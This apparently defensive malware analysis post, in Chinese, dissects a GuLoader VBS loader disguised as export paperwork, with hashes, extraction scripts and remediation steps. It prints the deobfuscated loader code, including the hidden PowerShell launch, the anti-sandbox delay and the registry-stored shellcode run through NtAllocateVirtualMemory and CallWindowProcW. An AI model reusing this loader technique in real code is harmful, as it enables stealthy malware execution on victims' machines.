<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    GuLoader_VBS惡意加載器分析報告

    一顆小胡椒2022-03-05 15:48:33

    文件信息

    字段值文件名SALES-CONTRACT_PROFORMA-RFQ_UYRTR-84747392837_MARCH-EXPORT-DOCUMENTATION_2022.vbsMD56964c15109dfd8a657fc61c2589545a1SHA168d16237ed55a638edc3f3a1a71c099b0e7ce0e5文件類型VBS文件大小141796 bytes發現時間2022-03-03 08:25:13 UTC

    過微步云沙箱

    關鍵代碼

    Dim objshell, MyFile
    Runderneth7="-NoExit -EncodedCommand "
    PREV="Wscript.Shell"
    SUBSI="%windir%"
    Robe="HKEY_CURRENT_USER\Software\DORI\FORTOLKNIN"
    NOMINER="\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    Fragtetuds4="REG_SZ"
    Sonder="Shell.Application"
    SERAFERSH="Scripting.FileSystemObject"
    ... ...
    Dim dteWait
    dteWait = DateAdd("s", 8, Now())
    '反調試及虛擬機‘
    Do Until (Now() > dteWait)
    SERAFERSH0 = SERAFERSH0 + 1
    Loop
    If SERAFERSH0 < 100 then 
    msgbox "non"
    end if 
    '寫注冊表,實際就是被加載的后門程序'
    objShell.RegWrite Robe,Tabulerin4,Fragtetuds4
    Set sa = CreateObject(Sonder)
    '檢測系統中的powershell程序'
    MyFile =  objShell.ExpandEnvironmentStrings(SUBSI) & NOMINER
    '執行加載命令'
    If CCA.FileExists(MyFile) = True then 
     sa.ShellExecute MyFile, Runderneth7 & chr(34) & epidiaop & chr(34), "", "", 0
    else 
     sa.ShellExecute "powershell.exe", Runderneth7 & chr(34) & epidiaop & chr(34), "", "", 0
     Brud = CCA.GetFileName(MyFile)
    end if
    

    執行加載命令

    首先解密拿到異或后的密文

    Wsh.echo epidiaop
    set fs =createobject("scripting.filesystemobject")
    if (fs.fileexists("c:/3.txt")) then
    set f =fs.opentextfile("c:/3.txt",8)
    f.write epidiaop 
    f.close
    else
    set f=fs.opentextfile("c:/3.txt",2, true)
    f.write epidiaop 
    f.close
    end if
    

    base64解密后

    #Ranchss8 Udkas6 LEDTOGETUS Porterag KLDTESINT Stand Defi Foun4 Rytter3 KURFYR Undominica7 Moskeneerp Earthshatt skrabet Bule2 AFFRERNES 
    Add-Type -TypeDefinition @"
    using System;
    using System.Runtime.InteropServices;
    public static class Pernitr1
    {
    [DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint Lovsangci5,int Lovsangci6,int Lovsangci7,int Lovsangci8,int Lovsangci9);
    [DllImport("user32.dll")]public static extern IntPtr DefWindowProcA(uint Pernitr0,int Pernitr1,int Pernitr2,int Pernitr3,int Pernitr4);
    [DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr Lovsangci1,ref Int32 Lovsangci2,int Lovsangci3);	
    [DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Pernitr6,ref Int32 forkva,int Lovsangci,ref Int32 Pernitr,int chronosco,int Pernitr7);
    }
    "@
    #Subgeomet4 Dossiermom ENTI elver KAUSALT Unapplied4 Upset6 CANA RONNIANTES Udmeldel6 Andronhom5 GAIU retsf Krisesitua schweizere UDLUDNINGE TAPR Jerngi  
    $Pernitr3=0;
    $Pernitr9=1048576;
    $Pernitr8=[Pernitr1]::NtAllocateVirtualMemory(-1,[ref]$Pernitr3,0,[ref]$Pernitr9,12288,64)
    $Unifo=(Get-ItemProperty -Path "HKCU:\Software\DORI").FORTOLKNIN
    $OXALD = [System.Byte[]]::CreateInstance([System.Byte],$Unifo.Length / 2)
    For($i=0; $i -lt $Unifo.Length; $i+=2)
    	{
            $OXALD[$i/2] = [convert]::ToByte($Unifo.Substring($i, 2), 16)
        }
    for($Afskrivnin=0; $Afskrivnin -lt $OXALD.count ; $Afskrivnin++)
    {
    	
    [Pernitr1]::RtlMoveMemory($Pernitr3+$Afskrivnin,[ref]$OXALD[$Afskrivnin],1)
    }
    [Pernitr1]::CallWindowProcW($Pernitr3, 0,0,0,0)
    

    總的關鍵三部分:

    • 外部調用類Pernitr1
    • 取出HKEY_CURRENT_USER\Software\DORI\FORTOLKNIN中的值,每兩位16進制編碼,寫入申請的內存空間
    • 調用編碼后的內存地址

    動態運行

    拿到C#編碼后的DLL文件d1sfwusl.dll: 87d64fffc57ebf7956e7d04ac91bf405

    間接的DLL->DLL調用庫函數

    被加載程序文件

    知道從注冊表取值方法,寫個腳本,得到后門程序:d8f1cda2ae8d5de640e7d82dd47e07af

    import base64
    import struct
    import re
    result = re.sub(r"(?<=\w)(?=(?:\w\w)+$)", " ", model)
    result = result.split(' ')
    result = [int(x, 16) for x in result]
    with open('backdoor', 'wb+') as f:
        for info in result:
            # f.write(base64.b64decode(info))
            s = struct.pack('B', info)
            f.write(s)
    

    修復建議

    • 刪除VBS程序
    • 刪除臨時目錄下的d1sfwusl相關文件
    • 清除HKEY_CURRENT_USER\Software\DORI\FORTOLKNIN下的信息
    • 殺死后門程序
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    GuLoader_VBS惡意加載分析報告
    該漏洞于2022年12月22日被公開披露。目前有49名專家遭黑客攻擊,所幸外交安全領域的主要信息并未外泄。與自然災害相關的索賠預計將連續第二年超過1000億美元。該組織自2018年被發現以來,持續發起針對哥倫比亞國家的政府部門、金融、保險等行業以及大型公司的定向攻擊。
    網絡安全研究人員揭示了名為GuLoader的高級惡意軟件下載采用多種技術來逃避安全軟件。
    研究人員報告了基于 shellcode 的下載程序 GuLoader 的新版本,它是上個月第四大最猖獗的惡意軟件。發生了重大變化。上月,Qbot 和 Anubis 也都在相應排行榜上位居榜首。盡管 Microsoft 通過阻止 Office 文件中的宏運行來減緩惡意軟件的傳播,但 Qbot 運營組織已迅速調整其散播方式。
    Group-IB 的最新發現顯示,自 2023 年 4 月以來, WinRAR 壓縮軟件曝出一個關鍵的安全漏洞,被認為是一個已經被利用的零日漏洞。
    WinRAR 上周修復了一個高危漏洞 CVE-2023-40477,該漏洞允許遠程攻擊者通過引誘受害者打開一個特制的 RAR 壓縮文件去執行任意代碼。安全公司 Group IB 周三公開了該漏洞的更多細節。該漏洞從今年四月起就開始被利用,攻擊者通過證券交易論壇引誘受害者打開含有惡意代碼的壓縮文件,利用漏洞攻擊者可以偽造文件擴展,在偽造的 .jpg 或 .txt 等文件格式中隱藏惡意腳本。當受害者打
    Proofpoint的研究人員公布了一項關于Hakbit勒索軟件的調查結果。當GuLoader運行時,它將下載并執行Hakbit,這是一種勒索軟件,使用AES-256加密文件。截至本文撰寫時,Proofpoint研究人員尚未找到任何人支付贖金的證據。Hakbit體現了以用戶為中心的勒索軟件活動,該活動針對特定的受眾,角色,組織和用戶的母語而定制。但是,安全專業人員應注意這一轉變并做出相應計劃,這是明智的。
    AgentTesla 是一個非常活躍的竊密類惡意軟件,主要通過電子郵件附件進行傳播分發。攻擊者正在嘗試使用 Telegram 回傳數據,但主要還是靠郵件服務器。
    導語:在2023年Gartner終端安全發展規律周期中,自動移動目標防御(AMTD)嶄露頭角,虹科Morphisec被譽為AMTD領域的樣本供應商。該周期呈現出終端安全領域的最新創新,旨在幫助安全領導者更好地規劃、采納和實施新技術。AMTD技術的預防性解決方案標志著網絡安全邁出了新的一步,它以在攻擊開始前預防和阻止攻擊為主,不同于傳統的檢測和響應技術。 自動移動目標防御(AMTD)首次被
    據相關消息,繼 Zero Day Initiative(ZDI)之后,安全公司 Group-IB 于前日發布博文,披露了存在于WinRAR壓縮軟件中的零日漏洞CVE-2023-38831,已經在 6.23 版本中修復。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类